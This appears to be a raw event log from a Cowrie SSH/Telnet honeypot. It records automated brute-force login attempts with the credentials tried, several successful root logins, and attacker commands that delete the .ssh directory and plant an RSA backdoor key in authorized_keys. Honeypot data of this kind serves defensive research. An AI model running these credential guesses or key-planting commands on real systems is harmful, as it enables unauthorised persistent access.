{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35253,"dst_ip":"1.2.3.4","dst_port":23,"session":"48316e8e6987","protocol":"telnet","message":"New connection: 212.227.235.229:35253 (1.2.3.4:23) [session: 48316e8e6987]","sensor":"my-vps","timestamp":"2025-09-09T01:30:09.535360Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34292,"dst_ip":"1.2.3.4","dst_port":22,"session":"62867963bfd2","protocol":"ssh","message":"New connection: 212.227.125.160:34292 (1.2.3.4:22) [session: 62867963bfd2]","sensor":"my-vps","timestamp":"2025-09-09T01:30:13.911071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:30:13.911815Z","src_ip":"212.227.125.160","session":"62867963bfd2"}
{"eventid":"cowrie.session.closed","duration":12.686854124069214,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:22.222112Z","src_ip":"212.227.235.229","session":"48316e8e6987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48349,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbfed86c0b0d","protocol":"ssh","message":"New connection: 212.227.235.229:48349 (1.2.3.4:22) [session: bbfed86c0b0d]","sensor":"my-vps","timestamp":"2025-09-09T01:30:35.887548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:35.888302Z","src_ip":"212.227.235.229","session":"bbfed86c0b0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:36.123564Z","src_ip":"212.227.235.229","session":"bbfed86c0b0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41988,"dst_ip":"1.2.3.4","dst_port":22,"session":"3db5c28d1ae5","protocol":"ssh","message":"New connection: 212.227.235.229:41988 (1.2.3.4:22) [session: 3db5c28d1ae5]","sensor":"my-vps","timestamp":"2025-09-09T01:30:36.549087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:36.551926Z","src_ip":"212.227.235.229","session":"3db5c28d1ae5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:36.784254Z","src_ip":"212.227.235.229","session":"3db5c28d1ae5"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:37.066565Z","src_ip":"212.227.235.229","session":"bbfed86c0b0d"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:37.717120Z","src_ip":"212.227.235.229","session":"3db5c28d1ae5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:38.304089Z","src_ip":"212.227.235.229","session":"bbfed86c0b0d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:38.953431Z","src_ip":"212.227.235.229","session":"3db5c28d1ae5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55540,"dst_ip":"1.2.3.4","dst_port":22,"session":"44b0b06a3c5a","protocol":"ssh","message":"New connection: 212.227.235.229:55540 (1.2.3.4:22) [session: 44b0b06a3c5a]","sensor":"my-vps","timestamp":"2025-09-09T01:30:51.311722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:51.313823Z","src_ip":"212.227.235.229","session":"44b0b06a3c5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:51.571418Z","src_ip":"212.227.235.229","session":"44b0b06a3c5a"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:30:52.602487Z","src_ip":"212.227.235.229","session":"44b0b06a3c5a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:53.863719Z","src_ip":"212.227.235.229","session":"44b0b06a3c5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39750,"dst_ip":"1.2.3.4","dst_port":22,"session":"8338fb8fb453","protocol":"ssh","message":"New connection: 212.227.235.229:39750 (1.2.3.4:22) [session: 8338fb8fb453]","sensor":"my-vps","timestamp":"2025-09-09T01:30:56.143358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:56.144153Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:56.389771Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:30:57.412126Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:30:57.962730Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:30:57.963407Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:30:57.964176Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:58.211078Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:30:58.722819Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:30:58.723559Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:30:58.971117Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:30:58.971953Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39760,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5835ee16a71","protocol":"ssh","message":"New connection: 212.227.235.229:39760 (1.2.3.4:22) [session: e5835ee16a71]","sensor":"my-vps","timestamp":"2025-09-09T01:30:59.232753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:30:59.233662Z","src_ip":"212.227.235.229","session":"e5835ee16a71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:30:59.487653Z","src_ip":"212.227.235.229","session":"e5835ee16a71"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:00.548310Z","src_ip":"212.227.235.229","session":"e5835ee16a71"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:01.805353Z","src_ip":"212.227.235.229","session":"e5835ee16a71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37310,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ad6bf182b2a","protocol":"ssh","message":"New connection: 212.227.235.229:37310 (1.2.3.4:22) [session: 0ad6bf182b2a]","sensor":"my-vps","timestamp":"2025-09-09T01:31:02.168390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:02.169433Z","src_ip":"212.227.235.229","session":"0ad6bf182b2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:02.478153Z","src_ip":"212.227.235.229","session":"0ad6bf182b2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43076,"dst_ip":"1.2.3.4","dst_port":22,"session":"e32bd654a981","protocol":"ssh","message":"New connection: 212.227.235.229:43076 (1.2.3.4:22) [session: e32bd654a981]","sensor":"my-vps","timestamp":"2025-09-09T01:31:02.787119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:02.788102Z","src_ip":"212.227.235.229","session":"e32bd654a981"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:02.907603Z","src_ip":"212.227.235.229","session":"e32bd654a981"}
{"eventid":"cowrie.login.failed","username":"apache","password":"pass","message":"login attempt [apache/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T01:31:03.428330Z","src_ip":"212.227.235.229","session":"e32bd654a981"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:31:03.758468Z","src_ip":"212.227.235.229","session":"0ad6bf182b2a"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:04.007616Z","src_ip":"212.227.235.229","session":"8338fb8fb453"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:04.069464Z","src_ip":"212.227.235.229","session":"0ad6bf182b2a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:04.550121Z","src_ip":"212.227.235.229","session":"e32bd654a981"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34587,"dst_ip":"1.2.3.4","dst_port":23,"session":"57c5ad512aae","protocol":"telnet","message":"New connection: 212.227.125.160:34587 (1.2.3.4:23) [session: 57c5ad512aae]","sensor":"my-vps","timestamp":"2025-09-09T01:31:12.659859Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49774,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dc722acad99","protocol":"ssh","message":"New connection: 212.227.235.229:49774 (1.2.3.4:22) [session: 6dc722acad99]","sensor":"my-vps","timestamp":"2025-09-09T01:31:22.562944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:31:22.563760Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:31:22.824888Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:31:23.911000Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:31:24.485896Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:31:24.486698Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:31:24.487604Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:31:24.749839Z","src_ip":"212.227.235.229","session":"6dc722acad99"}
